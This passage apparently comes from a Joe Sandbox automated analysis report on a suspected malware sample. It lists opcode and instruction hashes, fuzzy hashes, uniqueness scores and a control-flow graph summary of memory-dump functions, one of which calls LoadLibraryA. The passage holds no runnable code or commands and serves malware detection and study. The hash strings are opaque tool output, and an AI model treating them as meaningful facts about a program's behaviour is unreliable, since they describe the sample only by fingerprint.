                          • Opcode ID: 8921796b09f344c269f2ecc6ef7ae7524875710d1d8bed2eba7257a296719387
                          • Instruction ID: a4c756e13957902fab8494f196286f467e3813173375bd0597d1f688f3845c46
                          • Opcode Fuzzy Hash: 8921796b09f344c269f2ecc6ef7ae7524875710d1d8bed2eba7257a296719387
                          • Instruction Fuzzy Hash: DF4157B1D006588FDB10CFA9C89479EBBF1FB48314F14816AE855E73A0D7B59886CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 20 14d0ef0-14d38e7 22 14d38e9-14d390e 20->22 23 14d393b-14d3987 LoadLibraryA 20->23 22->23 28 14d3910-14d3912 22->28 26 14d3989-14d398f 23->26 27 14d3990-14d39c1 23->27 26->27 35 14d39d1 27->35 36 14d39c3-14d39c7 27->36 29 14d3935-14d3938 28->29 30 14d3914-14d391e 28->30 29->23 32 14d3920 30->32 33 14d3922-14d3931 30->33 32->33 33->33 37 14d3933 33->37 39 14d39d2 35->39 36->35 38 14d39c9 36->38 37->29 38->35 39->39
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 6a6b31627eee1e893614aeb3acc89fe65b6bb9e9ce9192c8f1eb18f19848b59f
                          • Instruction ID: 0c293bf0d28bee7cf9b914a2899a3e02db8d83bd709d24e136a582dcb274e046
                          • Opcode Fuzzy Hash: 6a6b31627eee1e893614aeb3acc89fe65b6bb9e9ce9192c8f1eb18f19848b59f
                          • Instruction Fuzzy Hash: F64135B0D006588FDB10CFA9C89579EBBF1FB48314F14816AE855E73A0D7B49886CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.367664983.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_14d0000_xYWm6BV3NZ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac5531e8d6e039cc6dfbb914e696fb9a7a90a8e02badf09f344d2fb53e98781d
                          • Instruction ID: 2d25c9e09b81e8376ac93a1e10e132ef5a37d6ceb34d1fd83f19e99b06e33910
                          • Opcode Fuzzy Hash: ac5531e8d6e039cc6dfbb914e696fb9a7a90a8e02badf09f344d2fb53e98781d
                          • Instruction Fuzzy Hash: 81915C70E00249DFDF14CFA9C9A07EEBBF2AF88314F15852AE415A73A4DB749845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%